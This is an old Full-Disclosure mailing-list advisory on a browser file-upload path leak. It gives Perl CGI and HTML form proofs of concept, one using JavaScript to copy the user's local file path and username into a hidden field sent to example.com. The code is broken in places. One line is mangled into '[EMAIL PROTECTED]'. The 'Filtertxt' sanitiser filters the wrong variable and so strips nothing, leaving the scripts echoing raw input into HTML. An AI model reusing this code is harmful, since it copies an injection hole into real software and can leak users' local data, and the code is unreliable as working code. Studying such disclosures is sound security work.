Multi browser sensitive information disclosure
I. DESCRIPTION:
Mr.upken disclosed this issue publicly on 19th Feb. 2005. Here is his advisory.(language is Japanese) http://xxx.upken.jp/report/ieup/ I have a few additional details to add to his original advisory.
II. IMPACT:
Disclosure of sensitive information to an unauthorised user.
III. TECHNICAL DETAILS:
RFC1867 is the standard definition of that "Browse..." button that you use to upload files to a Web server. It introduced the INPUT field type="file", which is that button, and also specified a multipart form encoding which is capable of encapsulating files for upload along with all the other fields on an upload form.
As Mr.upken has mentioned in his advisory, there is a weakness in "Form-based File Upload in HTML". "When we use InternetExplorer" , he says ,"secret or sensitive information can be exposed by an malicious people."
I have tested some examples, and it is found that Firefox, Opera, and InternetExplorer have a weakness.( tested on WindowsXPSp2 )
IV. Proof of Concept [A].
server-side Perl CGI.(ask.cgi) - --------------------------- #!/usr/bin/perl print "Content-Type: text/html\n\n";
die if $ENV{CONTENT_LENGTH} > 100*1024;$objectname = "RFC1867";
$boundary = <STDIN>;
$boundary =~s /\r\n//;
while(<STDIN>){
if($_ =~ /$objectname/){
~s/\r\n//;
~s/"//g;
@dum = split(/filename=/, $_);
$rfc1867 = [EMAIL PROTECTED] - 1];
}
}
&Filtertxt( $rfc1867 );
print "$rfc1867\n";exit(0);
sub Filtertxt {
local( $ft ) = @_;
$fd =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
return( $ft ) ;
}
- ---------------------------client-side FORM. - --------------------------- <form name="XA" method="POST" enctype="multipart/form-data" action="http://example.com/cgi-bin/ask.cgi";> <input type="file" name="RFC1867"> <input type="hidden" name="XB" value="HIDDEN"> <input type=submit value="Upload"> </form> - ---------------------------
NOTE: Method is "POST". When we upload a some file, %USERNAME% , Path, etc... is disclosed. I guess that only IE has a weakness.
V. Proof of Concept [B].
server-side Perl CGI.(named ask2.cgi) - --------------------------- #!/usr/bin/perl
if($ENV{'REQUEST_METHOD'} eq 'POST'){
#reads inputted variables through POST
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
}
else{
#reads inputted variables through GET
$buffer = $ENV{'QUERY_STRING'};
}#splits the variables at &
@pairs = split(/&/, $buffer);
foreach $pair (@pairs) {
#sets the value and name of each var
($name, $value) = split(/=/, $pair);
#makes each + into a space
$value =~ tr/+/ /;
#URL decode
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
#filter out bad characters & # < > " '
$value = &Filtertxt( $value );
#sets the varibles in a hash
$FORM{$name} = $value;
}#print html .
print "Content-Type: text/html\n";
print "\n";
print "$FORM{'XB'}\n";
print "<br>\n";
print "$FORM{'RFC1867'}\n";exit(0);
sub Filtertxt {
local( $ft ) = @_;
$fd =~ s/[\<\>\"\'\%\;\)\(\&\+]//g;
return( $ft ) ;
}
- ---------------------------client-side FORM. - --------------------------- <form name="XA" method="GET" enctype="multipart/form-data" action="http://example.com/cgi-bin/ask2.cgi";> <input type="file" name="RFC1867"> <input type="hidden" name="XB" value="HIDDEN"> <input type=submit value="Upload"> </form> - ---------------------------
NOTE: Method is "GET". When we try to upload a some file, %USERNAME% , Path, etc... is disclosed. I guess that both Opera and IE have a weakness.
V. Proof of Concept [C]. server-side Perl CGI is as same as Proof of Concept [B].
client-side FORM. - --------------------------- <form name="XA" method="GET" enctype="multipart/form-data" action="http://example.com/cgi-bin/ask2.cgi";> <input type="file" name="RFC1867"> <input type="hidden" name="XB" value="HIDDEN"> <input type=submit value="Upload" onclick="document.XA.XB.value=document.XA.RFC1867.value;return true" > </form> - ---------------------------
NOTE: Method is "GET". When we try to upload a some file, %USERNAME% , Path, etc... is disclosed. I guess that all Firefox,Opera and IE have a weakness, using evil JavaScript scripting.
VI. Other browser on Other OS. not tested. But......
VII. Is this a vulnerability?
At once I had used InternetExplore as a FTP tool. Today, when I am testing PoC3, browsing upload file, using Firefox , I find "MyNetwork - ftp02.websamba.com - mhtmlbug - scriptkitty.jpg" and upload it to another server. Then my monitor displays C:\Documents and Settings\%USERNAME%\Local Settings\ Temporary Internet Files\Content.IE5\YB6J6PY3\scriptkitty[4].jpg
Oh,no. YB6J6PY3 ! It is no matter. I guess this is NOT a vulnerability, maybe.
VIII. Workaround
Do not upload any file onto untrusted server. Do not attach any file ( while sending WebMAIL, posting ML,etc). With killing JavaScript , use Firefox.
VIII. Credit
Discovery: upken Additional Research: bitlance winter
BEST REGARDS.
-- bitlance winter
_________________________________________________________________
Don�t just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
